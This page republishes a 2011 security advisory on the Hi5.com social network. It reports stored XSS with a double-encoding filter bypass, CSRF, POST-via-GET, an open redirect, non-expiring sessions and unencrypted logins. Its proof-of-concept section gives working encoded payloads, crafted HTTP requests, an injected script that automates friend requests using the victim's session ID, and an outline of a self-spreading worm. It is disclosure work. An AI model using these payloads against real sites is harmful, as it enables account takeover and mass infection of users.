Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Hi5.com XSS / XSRF / URL Redirection / Lack Of Encryption

🗓️ 01 May 2011 00:00:00Reported by Eduardo Garcia MeliaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 46 Views

Hi5.com social network with vulnerabilities such as POST requests through GET method, Persistent Cross-Site Scripting, Cross-Site Request Forgery, URL Redirection, and Lack of Encryption

Code
`=============================================  
INTERNET SECURITY AUDITORS ALERT 2010-11  
- Original release date: 29th October 2010  
- Last revised: 1st May 2011  
- Discovered by: Eduardo Garcia Melia  
- Severity: 7.8/10 (CVSSv2 Base Scored)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Multiple vulnerabilities in Hi5.com social network.  
  
II. BACKGROUND  
-------------------------  
Hi5 is a social network (www.hi5.com). The company was founded in 2003  
by Ramu Yalamanchi. Hi5 has 80 million registered users.  
  
III. DESCRIPTION  
-------------------------  
This social network has the next vulnerabilities:  
  
1. POST requests can be made through GET method  
The application allows realizing the POST requests by means of the GET  
method.  
  
2. Persistent Cross-Site Scripting (XSS)  
The persistent (or stored) XSS vulnerability is a more devastating  
variant of a cross-site scripting flaw: it occurs when the data  
provided by the attacker is saved by the server, and then permanently  
displayed on "normal" pages returned to other users in the course of  
regular browsing, without proper HTML escaping.  
  
3. Cross-Site Request Forgery (CSRF)  
CSRF is an attack which forces an end user to execute unwanted actions  
on a web application in which he/she is currently authenticated. With  
a little help of social engineering (like sending a link via  
email/chat or simply visiting the attacker profile ), an attacker may  
force the users of a web application to execute actions of the  
attacker's choosing.  
  
In some places of the application, no token anti-xsrf is used. In  
other places, use as filter anti-xsrf the session value and the  
timestamp. The tokens anti-xsrf are not sufficient, because the  
persistent XSS vulnerability allows to execute Javascript code.  
  
4. URL Redirection  
A URL Redirection Attack is a kind of vulnerability that redirects you  
to another page freely out of the original website when accessed,  
usually integrated with a phishing attack.  
  
5. The session never expires  
While you not logout of the application, the session never expires.  
  
6. Transmission of sensitive information without encryption.  
Transmission of sensitive information without ciphered channel (HTTP  
protocol), allows that an attacker who has access to this traffic,  
capture the sensitive information that could be transmitted, as for  
example, the user and password or session.  
  
IV. PROOF OF CONCEPT  
-------------------------  
1. POST/GET  
With this request, auto-accept all comments on his profile  
automatically (this makes it possible to perform CSRF attacks more  
easy). Example:  
  
+ POST:  
  
POST /friend/book/updateAutoAcceptSettings.do HTTP/1.1  
Host: hi5.com  
  
autoAccept=0  
  
+ GET:  
  
GET /friend/book/updateAutoAcceptSettings.do?autoAccept=0 HTTP/1.1  
Host: hi5.com  
  
2. Persistent Cross-Site Scripting (XSS)  
In this case, you can bypass the XSS Filter for inject HTML/JavaScript  
code in the application both through comments in the profile as  
through internal mail messages, etc. The application accepts html tags  
such as <h1>, although many of the dangerous tags are filtered (not  
true with <img). To bypass the XSS Filter and inject HTML/JavaScript  
code, we just has double encoding:  
  
<script>alert('XSS')</script>  
  
And double encoding:  
  
&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;  
  
  
%26%23x3c%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x27%3B%26%23x58%3B%26%23x53%3B%26%23x53%3B%26%23x27%3B%26%23x29%3B%26%23x3c%3B%26%23x2f%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B  
  
Using double encoding is it possible to be bypass XSS filters.  
  
Example:  
  
POST /friend/profile/signBook.do HTTP/1.1  
Host: hi5.com  
userId=XXXXXX&userid=XXXXXXX&timestamp=-7099815752887097952&js=022EE4CA9DBE77D9D18EF5B8E43F9C71&image=&body=%26%23x3c%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x27%3B%26%23x58%3B%26%23x53%3B%26%23x53%3B%26%23x27%3B%26%23x29%3B%26%23x3c%3B%26%23x2f%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B  
  
This POST request, shows the typical popup with the "XSS" message, but  
can be developed for serious attacks like Rainbow worm or other worms  
in already used in social networks.  
  
3. Cross-Site Request Forgery (CSRF)  
There are requests in the application using anti-XSRF tokens, but  
others do not and have been identified and exploited.  
  
When the application do not have any token anti-xsrf, to perform this  
attack, the attacker would simply edit her profile, and in the  
interests tab, in any field put  
<img%20src="/friend/book/updateAutoAcceptSettings.do?autoAccept=0"/>.  
Example:  
  
POST /friend/profile/editPersonal.do HTTP/1.1  
Host: hi5.com  
  
timestamp=-5798286480324775860&userId=XXXXXXX&interests=<img%20src="/friend/book/updateAutoAcceptSettings.do?autoAccept=0"/>&origAllTimeFavoriteArtists=&allTimeFavoriteArtists=&favoriteMovies=&favoriteTVShows=&favoriteBooks=&favoriteQuote=  
  
This attack could also be exploited through parameter "interests" or  
any other.  
  
With this example, a person who visited the attacker's profile,  
auto-accept all comments on his profile automatically.  
  
On the other hand, when the applications use as token anti-xsrf the  
session and the timestamp, that attacker can use the persistent XSS  
vulnerability for injecting javascript code, that puts the session  
value in "js" parameter, and the timestamp value in "timestamp"  
parameter. For example, the normal POST request for add any friend:  
  
POST /friend/addFriendAjax.do HTTP/1.1  
Host: hi5.com  
Cookie: esn=FybWQ9s5gu1naTVi6IA0TG2vEbM.;  
JSESSIONID=CCE9B8BAED8F1A7A0FA50BF4D39A2238; hi5sp=homepage;  
tzoffset=2; userIdLogin=hi5tok;  
timestamp=5718257949255914042&js=CCE9B8BAED8F1A7A0FA50BF4D39A2238&requestSource=SEARCH&userid=XXXXXX&userId=  
  
Through GET/POST vulnerability is it possible to transform into GET  
request:  
  
GET  
/friend/addFriendAjax.do?timestamp=5718257949255914042&js=CCE9B8BAED8F1A7A0FA50BF4D39A2238&requestSource=SEARCH&userid=XXXXXX&userId=  
HTTP/1.1  
Host: hi5.com  
Cookie: esn=FybWQ9s5gu1naTVi6IA0TG2vEbM.;  
JSESSIONID=CCE9B8BAED8F1A7A0FA50BF4D39A2238;  
  
Finally, with persistent XSS vulnerability, the attacker can inject  
javascript code for automation this request (OR ANY OTHER) with  
something like this:  
  
<script>  
if (true) {  
window.location.href = "/friend/addFriendAjax.do?timestamp=" +  
url.replace("TIMESTAMP", new Date().getTime()) + "&js=" +  
HI5.Data.sessionId() + '&requestSource=SEARCH&userid=XXXXXX&userId=';  
}  
</script>  
  
4. URL Redirection  
The application allows redirect the browser to any Internet address.  
The goal of this attack could be make the victim feel that is  
correctly accesing to a resource valid resource, when in fact, is  
being redirected to fake man in the middle site for credential  
capture. Following, and example redirecting Google.com website:  
  
http://hi5.com/friend/tyTrack.do?cid=42624&id=1&e=&d=http://www.google.com  
  
5. The session never expires  
The session on hi5 social network never expires. While you do not  
logout, the session remain active:  
  
+ Set-Cookie: hi5loggedIn=true; Expires=Thu, 01-Jan-1970 00:00:10  
GMT; Path=/  
  
6. Transmission of sensitive using not using encryption.  
For example, the transmission of user and password in the  
authentication process.  
  
V. BUSINESS IMPACT  
------------------------  
These vulnerabilities allowed javascript to be run, opening a lot of  
possibilities to users with malicious intentions, for example, took  
over Hi5 social networks, infecting millions of users. One of them, is  
make all hi5 profiles visible (or any action):  
  
+ Make an Auto-accept user comments on victim's profile through the  
CSRF, simply visiting the attacker's profile.  
  
+ After that, the attacker write a message on victim's profile using  
JavaScript (persistent XSS) and would make victim's profile visible to  
all users.  
  
These two steps are repeated in every victim's profile and grow  
exponentially as users visit the victim's profile.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Hi5.com social network.  
  
VII. SOLUTION  
-------------------------  
-  
  
VIII. REFERENCES  
-------------------------  
http://www.hi5.com  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered by  
Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
October 29, 2010: First results  
January 02, 2011: Initial release  
May 01, 2011: Final revision  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
October 29, 2010: Vulnerability discovered by  
Internet Security Auditors  
January 10, 2011: First attempts for contacting hi5 networks.  
January 12, 2011: Received response and advisory sent to vendor.  
February 15, 2011: Contact for update -> under correction.  
March 04, 2011: Contact for update -> Still correcting.  
May 01, 2011: Published after some contacts without answer.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
  
XIII. ABOUT  
-------------------------  
Internet Security Auditors is a Spain based leader in web application  
testing, network security, penetration testing, security compliance  
implementation and assessing. Our clients include some of the largest  
companies in areas such as finance, telecommunications, insurance,  
ITC, etc. We are vendor independent provider with a deep expertise  
since 2001. Our efforts in R&D include vulnerability research, open  
security project collaboration and whitepapers, presentations and  
security events participation and promotion. For further information  
regarding our security services, contact us.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 May 2011 00:00Current
0.3Low risk
Vulners AI Score0.3
hi5social networkvulnerabilitiespost requestscross-site scriptingcross-site request forgeryurl redirectionlack of encryption
46